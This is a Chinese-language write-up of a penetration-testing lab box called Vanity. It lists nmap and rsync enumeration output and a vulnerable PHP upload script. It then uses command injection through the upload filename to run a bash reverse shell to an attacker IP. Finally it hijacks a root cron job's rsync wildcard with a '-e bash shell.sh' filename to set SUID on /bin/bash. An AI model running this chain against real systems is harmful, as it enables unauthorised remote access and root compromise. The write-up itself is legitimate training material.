主要知識點
Linux命令注入
rsync 腳本劫持(以前tar 備份腳本劫持也是利用了類似的方法)
具體步驟
nmap掃描結果,發現web服務開放,并且 rsync服務開放,值得研究一下
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-30 14:37 UTC
Nmap scan report for 192.168.51.234
Host is up (0.00065s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 62:36:1a:5c:d3:e3:7b:e1:70:f8:a3:b3:1c:4c:24:38 (RSA)
| 256 ee:25:fc:23:66:05:c0:c1:ec:47:c6:bb:00:c7:4f:53 (ECDSA)
|_ 256 83:5c:51:ac:32:e5:3a:21:7c:f6:c2:cd:93:68:58:d8 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Vanity Virus Scanner
873/tcp open rsync (protocol version 31)
80端口看起來是一個文件上傳的web 應用,但是經過測試發現是有文件后綴校驗的,暫時擱置一下
?
通過rsync來把remote server上的目錄同步下來,不過backup目錄同步需要密碼,而我們目前沒有,所以只能先同步一下source目錄
先對目標服務器進行rsync服務掃描?nmap -sV --script "rsync-list-modules" -p <PORT> <IP>?
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-30 11:41 CST
Nmap scan report for 192.168.203.234
Host is up (0.22s latency).PORT STATE SERVICE VERSION
873/tcp open rsync (protocol version 31)
| rsync-list-modules:
| source Web Source
|_ backup Virus Samples BackupService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 4.74 seconds
繼而進行rsync同步
C:\home\kali\Documents\OFFSEC\GoToWork\Vanity\test> rsync -av rsync://username@192.168.216.234:873/source ./source
receiving incremental file list
created directory ./source
./
index.html
style.css
uploads/
uploads/upload.phpsent 96 bytes received 4,002 bytes 2,732.00 bytes/sec
total size is 3,707 speedup is 0.90C:\home\kali\Documents\OFFSEC\GoToWork\Vanity\test> ls -lart
total 12
drwxr-xr-x 3 kali kali 4096 Oct 25 2022 source
drwxrwxr-x 5 kali kali 4096 Dec 30 22:32 ..
drwxrwxr-x 3 kali kali 4096 Dec 30 22:35 .C:\home\kali\Documents\OFFSEC\GoToWork\Vanity\test> ls -l source/uploads
total 4
-rw-r--r-- 1 kali kali 738 Oct 25 2022 upload.phpC:\home\kali\Documents\OFFSEC\GoToWork\Vanity\test>
?
source目錄下有一個upload.php文件,其中的代碼如下,看起來會對上傳的文件校驗后綴,如果在deny list中,就會阻止上傳,反之,則會運行/usr/bin/clamscan 命令,參數是name變量,于是我們可以嘗試一下在name中拼接linux命令
<?php//Check if the file is well uploadedif($_FILES['file']['error'] > 0) { echo 'Error during uploading, try again'; }//Set up valid extension$extsNotAllowed = array( 'php','php7','php6','phar','phtml','phps','pht','phtm','pgif','shtml','htaccess','inc');$extUpload = strtolower( substr( strrchr($_FILES['file']['name'], '.') ,1) ) ;echo $_FILES['file']['name'];echo strrchr($_FILES['file'}['name'],'.');//Check if the uploaded file extension is allowedif (in_array($extUpload, $extsNotAllowed) ) { echo 'File not allowed'; } else {$name = "{$_FILES['file']['name']}";$result = move_uploaded_file($_FILES['file']['tmp_name'], $name);if($result){system("/usr/bin/clamscan $name");}}?>
利用burpsuite嘗試了一下,最后使用了base64 編碼的方式創建了reverse shell,其中base64編碼的部分為:?bash -i >& /dev/tcp/192.168.45.225/80 0>&1
上傳并運行pspy64,會發現 /opt/backup.sh會被root定期運行,是個schedule job
██▓███ ██████ ██▓███ ▓██ ██▓▓██? ██??██ ? ▓██? ██??██ ██?▓██? ██▓?? ▓██▄ ▓██? ██▓? ?██ ██??██▄█▓? ? ? ██??██▄█▓? ? ? ?██▓??██? ? ??██████???██? ? ? ? ██?▓??▓?? ? ?? ?▓? ? ??▓?? ? ? ██??? ?? ? ? ?? ? ??? ? ▓██ ??? ?? ? ? ? ?? ? ? ?? ? ? ? ? ? Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
......
......
2024/12/30 05:38:01 CMD: UID=0 PID=174378 | bash /opt/backup.sh
2024/12/30 05:38:01 CMD: UID=0 PID=174377 | /bin/sh -c bash /opt/backup.sh
其中代碼為如下
cd /var/www/html/uploads/
rsync --password-file=/root/passwd -a * rsync://vanity/backup/而rsync命令的話有-e 參數來制定運行命令
rsync --help
......
......-e, --rsh=COMMAND specify the remote shell to use
......
......?
于是我們仿照曾經tar命令備份的 方法,創建具有'-e xxxxx'的文件名來充當參數,擴展功能
www-data@vanity:/var/www/html/uploads$ echo "chmod +s /bin/bash" > shell.sh
echo "chmod +s /bin/bash" > shell.sh
ww-data@vanity:/var/www/html/uploads$ chmod +s shell.sh
chmod +s shell.sh
www-data@vanity:/var/www/html/uploads$ whereis python
whereis python
/python: /usr/bin/python3.8 /usr/lib/python2.7 /usr/lib/python3.9 /usr/lib/python3.8 /etc/python3.8 /usr/local/lib/python3.8
www-data@vanity:/var/www/html/uploads$ usr/bin/python3.8 -c 'import pty;pty.spawn("/bin/bash")'
<in/python3.8 -c 'import pty;pty.spawn("/bin/bash")'
www-data@vanity:/var/www/html/uploads$ touch -- '-e bash shell.sh'
touch -- '-e bash shell.sh'
過了一會兒,就發現了, /bin/bash具備了SUID
www-data@vanity:/var/www/html/uploads$ ls -l /bin/bash
ls -l /bin/bash
-rwsr-sr-x 1 root root 1183448 Apr 18 2022 /bin/bash
www-data@vanity:/var/www/html/uploads$ /bin/bash -p
/bin/bash -p
bash-5.0# cat /root/proof.txt
cat /root/proof.txt
e181a37c7ba8f8cbd276eee4a49a3e8f
?
?
——線性表(順序存儲和鏈式存儲))
)
微服務篇-參考回答)
(日更))
)
